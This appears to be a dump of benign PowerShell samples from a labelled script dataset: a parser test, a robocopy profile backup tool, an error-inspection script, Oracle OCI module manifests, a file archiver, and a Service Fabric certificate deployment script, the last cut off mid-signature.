[System.Management.Automation.Language.Parser]::ParseInput( 'switch -parallel ($foo) {1 {break}}', [ref]$null, [ref]$errors) } It '$errors.Count' { $errors.Count | Should -Be 1 } It '$errors[0].ErrorId' { $errors[0].ErrorId | Should -Be 'KeywordParameterReservedForFutureUse' } } }
combined_dataset/train/non-malicious/4174.ps1
4174.ps1
[CmdletBinding()] param ( [string]$DirectoryExclusionsFile = 'DirectoryExclusions.txt', [string]$FileExclusionsFile = 'FileExclusions.txt', [string]$RobocopySwitches = '/e /eta /r:1 /w:0 /TEE /MIR', [ValidateNotNullOrEmpty()][string]$DestinationUNC = '\\profiles\userprofiles' ) function Get-RelativePath { [CmdletBinding()][OutputType([string])] param () $Path = (split-path $SCRIPT:MyInvocation.MyCommand.Path -parent) + "\" Return $Path } function Invoke-RoboCopy { [CmdletBinding()][OutputType([string])] param ( [ValidateNotNullOrEmpty()][string]$ComputerName, [ValidateNotNullOrEmpty()][string]$UserName ) $RelativePath = Get-RelativePath $Executable = $Env:windir + "\system32\robocopy.exe" $DirectoryExclusions = Get-Content ($RelativePath + $DirectoryExclusionsFile) IF ($DirectoryExclusions -ne $null) { $ExcludeDir = "/xd" foreach ($Exclusion in $DirectoryExclusions) { $ExcludeDir += [char]32 + $Exclusion } } $FileExclusions = Get-Content ($RelativePath + $FileExclusionsFile) IF ($FileExclusions -ne $null) { $ExcludeFiles = "/xf" foreach ($Exclusion in $FileExclusions) { $ExcludeFiles += [char]32 + $Exclusion } } If ($DestinationUNC.Substring($DestinationUNC.Length - 1) -ne '\') { $Arguments = [char]34 + '\\' + $ComputerName + '\c$\users\' + $UserName + [char]34 + [char]32 + [char]34 + $DestinationUNC + '\' + $ComputerName + [char]34 + [char]32 + $RobocopySwitches + [char]32 + $ExcludeDir + [char]32 + $ExcludeFiles + [char]32 + '/LOG:' + [char]34 + $DestinationUNC + '\0RobocopyLogs\' + $ComputerName + '.log' + [char]34 } else { $Arguments = [char]34 + '\\' + $ComputerName + '\c$\users\' + $UserName + [char]34 + [char]32 + [char]34 + $DestinationUNC + $ComputerName + [char]34 + [char]32 + $RobocopySwitches + [char]32 + $ExcludeDir + [char]32 + $ExcludeFiles + [char]32 + '/LOG:' + [char]34 + $DestinationUNC + '0RobocopyLogs\' + $ComputerName + '.log' + [char]34 } $ErrCode = (Start-Process -FilePath $Executable -ArgumentList $Arguments -WindowStyle Minimized -Wait -Passthru).ExitCode Return $ErrCode } $ComputerName = Read-Host -Prompt 'Input computer name' $UserName = Read-Host -Prompt 'Input user name' If ((Get-Item -Path ('\\' + $ComputerName + '\c$') -ErrorAction SilentlyContinue) -eq $null) { Write-Host "Computer not reachable or incorrect computer name" Exit 1 } If ((Get-Item -Path ('\\' + $Computername + '\c$\users\' + $Username) -ErrorAction SilentlyContinue) -eq $null) { Write-Host "Username is incorrect" Exit 1 } $ErrCode = Invoke-RoboCopy -ComputerName $ComputerName -UserName $UserName switch ($ErrCode) { 0 { Write-Host '0 - No Changes' } 1 { Write-Host '1 - OK Copy' } 2 { Write-Host '2 - Extra content deleted' } 3 { Write-Host '3 - OK Copy & Extra content deleted' } 4 { Write-Host '4 - Mismatches' } 5 { Write-Host '5 - OK Copy & mismatches'} 6 { Write-Host '6 - Mismatches & Extra content deleted'} 7 { Write-Host '7 - OK Copy & Mismatches & Extra content deleted'} 8 { Write-Host '8 - Failed'} 9 { Write-Host '9 - OK Copy & Failed'} 10 { Write-Host '10 - Failed & Extra content deleted'} 11 { Write-Host '11 - OK Copy & Failed & Extra content deleted'} 12 { Write-Host '12 - Failed & Mismatches'} 13 { Write-Host '13 - OK Copy & Failed & Mismatches'} 14 { Write-Host '14 - Failed & Mismatches & Extra content deleted'} 15 { Write-Host '15 - OK Copy & Failed & Mismatches & Extra content deleted'} 16 { Write-Host '16 - Fatal Error'} }
combined_dataset/train/non-malicious/Resolve-Error.ps1
Resolve-Error.ps1
#############################################################################\n##\n## Resolve-Error\n##\n## From Windows PowerShell Cookbook (O'Reilly)\n## by Lee Holmes (http://www.leeholmes.com/guide)\n##\n##############################################################################\n\n<#\n\n.SYNOPSIS\n\nDisplays detailed information about an error and its context\n\n#>\n\nparam(\n ## The error to resolve\n $ErrorRecord = ($error[0])\n)\n\nSet-StrictMode -Off\n\n""\n"If this is an error in a script you wrote, use the Set-PsBreakpoint cmdlet"\n"to diagnose it."\n""\n\n'Error details ($error[0] | Format-List * -Force)'\n"-"*80\n$errorRecord | Format-List * -Force\n\n'Information about the command that caused this error ' +\n '($error[0].InvocationInfo | Format-List *)'\n"-"*80\n$errorRecord.InvocationInfo | Format-List *\n\n'Information about the error''s target ' +\n '($error[0].TargetObject | Format-List *)'\n"-"*80\n$errorRecord.TargetObject | Format-List *\n\n'Exception details ($error[0].Exception | Format-List * -Force)'\n"-"*80\n\n$exception = $errorRecord.Exception\n\nfor ($i = 0; $exception; $i++, ($exception = $exception.InnerException))\n{\n "$i" * 80\n $exception | Format-List * -Force\n}
combined_dataset/train/non-malicious/sample_42_90.ps1
sample_42_90.ps1
# # Module manifest for module 'OCI.PSModules.Logging' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Logging.dll' # Version number of this module. ModuleVersion = '83.2.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'f66b580b-7ca1-43ed-a8f5-fc5d59c67c85' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Logging Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.2.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Logging.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCILoggingLog', 'Get-OCILoggingLogGroup', 'Get-OCILoggingLogGroupsList', 'Get-OCILoggingLogSavedSearch', 'Get-OCILoggingLogSavedSearchesList', 'Get-OCILoggingLogsList', 'Get-OCILoggingServicesList', 'Get-OCILoggingUnifiedAgentConfiguration', 'Get-OCILoggingUnifiedAgentConfigurationsList', 'Get-OCILoggingWorkRequest', 'Get-OCILoggingWorkRequestErrorsList', 'Get-OCILoggingWorkRequestLogsList', 'Get-OCILoggingWorkRequestsList', 'Move-OCILoggingLogGroupCompartment', 'Move-OCILoggingLogLogGroup', 'Move-OCILoggingLogSavedSearchCompartment', 'Move-OCILoggingUnifiedAgentConfigurationCompartment', 'New-OCILoggingLog', 'New-OCILoggingLogGroup', 'New-OCILoggingLogSavedSearch', 'New-OCILoggingUnifiedAgentConfiguration', 'Remove-OCILoggingLog', 'Remove-OCILoggingLogGroup', 'Remove-OCILoggingLogSavedSearch', 'Remove-OCILoggingUnifiedAgentConfiguration', 'Remove-OCILoggingWorkRequest', 'Update-OCILoggingLog', 'Update-OCILoggingLogGroup', 'Update-OCILoggingLogSavedSearch', 'Update-OCILoggingUnifiedAgentConfiguration' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Logging' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/File Archive by Creation.ps1
File Archive by Creation.ps1
# ============================================================================================== # # NAME: FileArchivingCrTime.ps1 # # AUTHOR: Saehrig ,Steven # DATE : 5/19/2008 # # COMMENT: This script will search a directory and archive files based on create time -7 days. # for specified extension. # ============================================================================================== #variables - This section defines the source and destination locations @@$source = 'sourcefilepath' @@$archive = 'DestinationFilepath' #Functions - This section defines all the functions to be called below. function ArchiveFiles{ foreach ($a in Get-ChildItem $source) { @@ if ($a.Extension.Equals('.pdf') -and ($a.creationtime -lt ($(Get-Date).Adddays(-7)))) { $cm = $a.creationtime.month $cy = $a.creationtime.year if (Test-Path $archive\\$cy-$cm){ Move-Item $a.FullName $archive\\$cy-$cm } else { New-Item -path $archive -name $cy-$cm -type directory Move-Item $a.FullName $archive\\$cy-$cm } } } } #Execution of Script will begin here. ArchiveFiles
combined_dataset/train/non-malicious/sample_2_25.ps1
sample_2_25.ps1
# # Module manifest for module 'OCI.PSModules.Vbsinst' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Vbsinst.dll' # Version number of this module. ModuleVersion = '93.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'cc03b9ae-8da9-4b89-b900-8f068d3d2c43' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Vbsinst Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '93.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Vbsinst.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIVbsinstance', 'Get-OCIVbsinstancesList', 'Get-OCIVbsinstWorkRequest', 'Get-OCIVbsinstWorkRequestErrorsList', 'Get-OCIVbsinstWorkRequestLogsList', 'Get-OCIVbsinstWorkRequestsList', 'Move-OCIVbsinstanceCompartment', 'New-OCIVbsinstance', 'Remove-OCIVbsinstance', 'Update-OCIVbsinstance' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Vbsinst' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_58_0.ps1
sample_58_0.ps1
$ServerCertificateName = "CN=ServiceFabricServerCert" $ClientCertificateName = "CN=ServiceFabricClientCert" function IsSecurityX509([string]$ClusterConfigFilePath) { $jsonConfig = Get-Content $ClusterConfigFilePath -Raw | ConvertFrom-Json $properties = $jsonConfig.properties if ($properties -ne $Null) { $security = $properties.security if ($security -ne $Null ) { $clusterCredentialType = $security.ClusterCredentialType return ($clusterCredentialType -ne $Null -And $clusterCredentialType -eq "X509") } } return $False } function IsLocalMachine([string] $MachineName) { return ($MachineName -eq $env:ComputerName) -Or ($MachineName -eq "localhost") } function GetHostName([string] $iPAddress) { $hostName = $iPAddress if ([bool]($iPAddress -as [ipaddress])) { $hostName = [System.Net.Dns]::GetHostByAddress($iPAddress).HostName } return $hostName } function IsThisMachineServer([string] $ClusterConfigFilePath) { $jsonConfig = Get-Content $ClusterConfigFilePath -Raw | ConvertFrom-Json $nodes = $jsonConfig.nodes Foreach ($node in $nodes) { $hostName = GetHostName -iPAddress $node.iPAddress if (IsLocalMachine -MachineName $hostName) { return $True; } } return $False } function InstallCertToLocal([string] $CertSetupScript) { invoke-expression "& '$CertSetupScript' -Install -CertSubjectName '$ServerCertificateName'" invoke-expression "& '$CertSetupScript' -Install -CertSubjectName '$ClientCertificateName'" $cerLoc = "cert:\LocalMachine\My" $cert = Get-ChildItem -Path $cerLoc | where { $_.Subject -like "*$ServerCertificateName*" } $serverthumbprint = $cert.Thumbprint $cert = Get-ChildItem -Path $cerLoc | where { $_.Subject -like "*$ClientCertificateName*" } $clientthumbprint = $cert.Thumbprint return $serverthumbprint,$clientthumbprint } function IsOneBox([string] $ClusterConfigFilePath) { $jsonConfig = Get-Content $ClusterConfigFilePath -Raw | ConvertFrom-Json $nodes = $jsonConfig.nodes $machineNames = $nodes.iPAddress | select -uniq return ($machineNames.Count -eq 1) } function ExportCertificateToLocal([string]$PackageRoot, [string]$CertSetupScript, [string]$ServerThumbprint, [string]$ClientThumbprint, [string]$ClusterConfigFilePath) { $serverCertificate = ExportCertificate -PackageRoot $packageRoot -Thumbprint $serverThumbprint -Name "server" $clientCertificate = ExportCertificate -PackageRoot $packageRoot -Thumbprint $clientThumbprint -Name "client" Write-Host "Server certificate is exported to $($serverCertificate[0]) with the password $($serverCertificate[1])" Write-Host "Client certificate is exported to $($clientCertificate[0]) with the password $($clientCertificate[1])" # If the current machine is server, then remove the client cert. If the current machine is client, then remove server cert. if (IsThisMachineServer -ClusterConfigFilePath $ClusterConfigFilePath) { if (-Not (IsOneBox -ClusterConfigFilePath $ClusterConfigFilePath)) { Write-Host "Remove client certificate on localhost." invoke-expression "& '$CertSetupScript' -Clean -CertSubjectName '$ClientCertificateName'" } } else { Write-Host "Remove server certificate on localhost." invoke-expression "& '$CertSetupScript' -Clean -CertSubjectName '$ServerCertificateName'" } return $serverCertificate } function ExportCertificate([string]$PackageRoot, [string]$Thumbprint, [string] $Name) { $OutputCertificateFolder = Join-Path $PackageRoot "Certificates" if (-Not(Test-Path $OutputCertificateFolder)) { try { New-Item -ItemType Directory -Force -Path $OutputCertificateFolder -ErrorAction Stop | Out-Null } catch { Write-Error "Unable to create output certificate directory $OutputCertificateFolder. Error: $_" exit 1 } } $PfxFilePath = "$OutputCertificateFolder\$Name.pfx" $randomnum = Get-Random $pswd = ConvertTo-SecureString -String "$randomnum" -Force -AsPlainText Get-ChildItem -Path "cert:\localMachine\my\$Thumbprint" | Export-PfxCertificate -FilePath $PfxFilePath -Password $pswd > $null return $PfxFilePath,$randomnum } function ModifyJsonThumbprint([string]$ClusterConfigFilePath, [string]$ServerThumbprint, [string]$ClientThumbprint, [string]$OutputPath) { Write-Host "Modify thumbprint in $ClusterConfigFilePath" $jsonConfig = Get-Content $ClusterConfigFilePath -Raw | ConvertFrom-Json $securityCertInfo = New-Object -TypeName PSObject $certificate= New-Object –TypeName PSObject $certificate | Add-Member -Name "Thumbprint" -value "$ServerThumbprint" -MemberType NoteProperty $certificate | Add-Member -Name "X509StoreName" -value "My" -MemberType NoteProperty $clientcertificate = New-Object -TypeName PSObject $clientcertificate | Add-Member -Name "CertificateThumbprint" -value "$ClientThumbprint" -MemberType NoteProperty $clientcertificate | Add-Member -Name "IsAdmin" -value $true -MemberType NoteProperty $clientcertificateArray = @() $clientcertificateArray += $clientcertificate $securityCertInfo | Add-Member -Name "ClusterCertificate" -value $certificate -MemberType NoteProperty $securityCertInfo | Add-Member -Name "ServerCertificate" -value $certificate -MemberType NoteProperty $securityCertInfo | Add-Member -Name "ClientCertificateThumbprints" -value $clientcertificateArray -MemberType NoteProperty if (IsReverseProxyEndPointConfigured -ClusterConfigFilePath $ClusterConfigFilePath) { $securityCertInfo | Add-Member -Name "ReverseProxyCertificate" -value $certificate -MemberType NoteProperty } $jsonConfig.properties.security.CertificateInformation = $securityCertInfo $jsonObject = ConvertTo-Json $jsonConfig -Depth 10 $jsonObject > $OutputPath } function IsReverseProxyEndPointConfigured([string]$ClusterConfigFilePath) { $jsonConfig = Get-Content $ClusterConfigFilePath -Raw | ConvertFrom-Json $nodes = $jsonConfig.nodes $properties = $jsonConfig.properties $nodetypes = $properties.nodetypes foreach($node in $nodes) { $nodetypeRef = $node.nodetypeRef foreach($nodetype in $nodetypes) { if ($nodetype.Name -eq $nodetypeRef) { if ($nodetype.reverseProxyEndpointPort -ne $Null) { return $True; } } } } return $False } function AddToTrustedHosts([string]$MachineName) { Write-Host "Adding $MachineName to TrustedHosts" Set-Item WSMan:\localhost\Client\TrustedHosts -Value "$MachineName" -Concatenate -Force } function InstallCertToRemote([string]$ClusterConfigFilePath, [string]$CertificatePath, [string]$Password) { $jsonConfig = Get-Content $ClusterConfigFilePath -Raw | ConvertFrom-Json $nodes = $jsonConfig.nodes $pswd = ConvertTo-SecureString -String $Password -Force -AsPlainText $certBytes = [System.IO.File]::ReadAllBytes($CertificatePath) $iPAddressList = $nodes.iPAddress | select -uniq Foreach ($iPAddress in $iPAddressList) { $machineName = GetHostName -iPAddress $iPAddress if (IsLocalMachine -MachineName $machineName) { Write-Host "Skipping certificate installation in $machineName." continue } AddToTrustedHosts -MachineName $machineName Write-Host "Connectting to $machineName" for($retry = 0; $retry -le 2; $retry ++) { Write-Host "Installing server certificate in $machineName for iteration $retry" Invoke-Command -ComputerName $machineName -ScriptBlock { param($pswd, $certBytes) Get-ChildItem -Path Cert:\LocalMachine\My | ? { $_.Subject -like "*$ServerCertificateName*" } | Remove-Item -Force Get-ChildItem -Path Cert:\LocalMachine\root | ? { $_.Subject -like "*$ServerCertificateName*" } | Remove-Item -Force Get-ChildItem -Path Cert:\CurrentUser\My | ? { $_.Subject -like "*$ServerCertificateName*" } | Remove-Item -Force $certPath = [System.IO.Path]::GetTempFileName() [system.IO.file]::WriteAllBytes($certPath, $certBytes); Import-PfxCertificate -Exportable -CertStoreLocation Cert:\LocalMachine\My -FilePath $certPath -Password $pswd > $null Import-PfxCertificate -Exportable -CertStoreLocation Cert:\LocalMachine\root -FilePath $certPath -Password $pswd > $null Import-PfxCertificate -Exportable -CertStoreLocation Cert:\CurrentUser\My -FilePath $certPath -Password $pswd > $null } -ArgumentList $pswd,$certBytes if ($?) { Write-Host "Installed server certificate in $machineName" break } if ($retry -eq 2) { Write-Host "Installing server certificate in $machineName failed after 3 attemps" } else { Write-Host "Unable to intall server certificate in $machineName, retry after 30 seconds..." Start-Sleep -Seconds 30 } } } } # SIG # Begin signature block # MIInkwYJKoZIhvcNAQcCoIInhDCCJ4ACAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBes9mKwSwmEyt5 # rlIN/UE8nv4hdY7kCy+udFdDWSrVDaCCDXYwggX0MIID3KADAgECAhMzAAACURR2 # zMWFg24LAAAAAAJRMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjEwOTAyMTgzMjU5WhcNMjIwOTAxMTgzMjU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDBIpXR3b1IYAMunV9ZYBVYsaA7S64mqacKy/OJUf0Lr/LW/tWlJDzJH9nFAhs0 # zzSdQQcLhShOSTUxtlwZD9dnfIcx4pZgu0VHkqQw2dVc8Ob21GBo5sVrXgEAQxZo # rlEuAl20KpSIFLUBwoZFGFSQNSMcqPudXOw+Mhvn6rXYv/pjXIjgBntn6p1f+0+C # 2NXuFrIwjJIJd0erGefwMg//VqUTcRaj6SiCXSY6kjO1J9P8oaRQBHIOFEfLlXQ3 # a1ATlM7evCUvg3iBprpL+j1JMAUVv+87NRApprPyV75U/FKLlO2ioDbb69e3S725 # XQLW+/nJM4ihVQ0BHadh74/lAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUMLgM7NX5EnpPfK5uU6FPvn2g/Ekw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzQ2NzU5NjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIVJlff+Fp0ylEJhmvap # NVv1bYLSWf58OqRRIDnXbHQ+FobsOwL83/ncPC3xl8ySR5uK/af4ZDy7DcDw0yEd # mKbRLzHIfcztZVSrlsg0GKwZuaB2MEI1VizNCoZlN+HlFZa4DNm3J0LhTWrZjVR0 # M6V57cFW0GsV4NlqmtelT9JFEae7PomwgAV9xOScz8HzvbZeERcoSRp9eRsQwOw7 # 8XeCLeglqjUnz9gFM7RliCYP58Fgphtkht9LNEcErLOVW17m6/Dj75zg/IS+//6G # FEK2oXnw5EIIWZraFHqSaee+NMgOw/R6bwB8qLv5ClOJEpGKA3XPJvS9YgOpF920 # Vu4Afqa5Rv5UJKrsxA7HOiuH4TwpkP3XQ801YLMp4LavXnvqNkX5lhFcITvb01GQ # lcC5h+XfCv0L4hUum/QrFLavQXJ/vtirCnte5Bediqmjx3lswaTRbr/j+KX833A1 # l9NIJmdGFcVLXp1en3IWG/fjLIuP7BqPPaN7A1tzhWxL+xx9yw5vQiT1Yn14YGmw # OzBYYLX0H9dKRLWMxMXGvo0PWEuXzYyrdDQExPf66Fq/EiRpZv2EYl2gbl9fxc3s # qoIkyNlL1BCrvmzunkwt4cwvqWremUtqTJ2B53MbBHlf4RfvKz9NVuh5KHdr82AS # MMjU4C8KNTqzgisqQdCy8unTMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # 